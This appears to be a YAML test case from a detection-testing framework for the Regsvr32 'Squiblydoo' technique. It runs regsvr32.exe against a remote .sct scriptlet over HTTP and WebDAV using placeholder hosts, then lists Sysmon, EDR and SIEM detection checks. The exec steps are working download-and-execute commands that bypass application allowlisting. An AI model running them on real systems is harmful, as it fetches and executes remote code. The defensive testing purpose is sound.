id: DLEXEC_008_regsvr32_squiblydoo
name: "Download and Execute — Regsvr32 Squiblydoo (SCT over HTTP and WebDAV)"
mitre: "T1218.010, T1105"
category: download_execute
description: >
  Executes a remote scriptlet (.sct) file via regsvr32.exe using the Squiblydoo
  technique. Regsvr32 can download and execute COM scriptlets from remote URLs
  entirely in memory, bypassing AppLocker and many application allowlisting solutions.
  Two methods: HTTP direct and WebDAV UNC. Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-008] Regsvr32 method 1 — SCT over HTTP (Squiblydoo)"

  - type: exec
    binary: regsvr32.exe
    args: /u /n /s /i:PLACEHOLDER_HTTP_URL/payload.sct scrobj.dll
    timeout_seconds: 30

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-008] Regsvr32 method 2 — SCT over WebDAV UNC"

  - type: exec
    binary: regsvr32.exe
    args: /u /n /s /i:\\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\payload.sct scrobj.dll
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "Sysmon Event ID 1: regsvr32.exe with /i: URL or UNC path — fully logged?"
  - "Sysmon Event ID 3: Network connection from regsvr32.exe to remote host?"
  - "Sysmon Event ID 7: scrobj.dll loaded into regsvr32.exe — module load captured?"
  - "EDR: Alert on regsvr32.exe with remote /i: argument? Classic Squiblydoo."
  - "EDR: Method 1 (HTTP) vs method 2 (WebDAV) — both caught or only one?"
  - "EDR: regsvr32.exe child processes and network connections captured?"
  - "SIEM: regsvr32.exe process events with remote path present?"
  - "Rule opportunity (critical): regsvr32.exe with /i: argument containing HTTP or UNC path"
  - "Rule opportunity: regsvr32.exe making outbound network connection (any)"
  - "Rule opportunity: regsvr32.exe loading scrobj.dll"
  - "Gap check: Squiblydoo is over a decade old — if your EDR misses it, that is a serious gap."
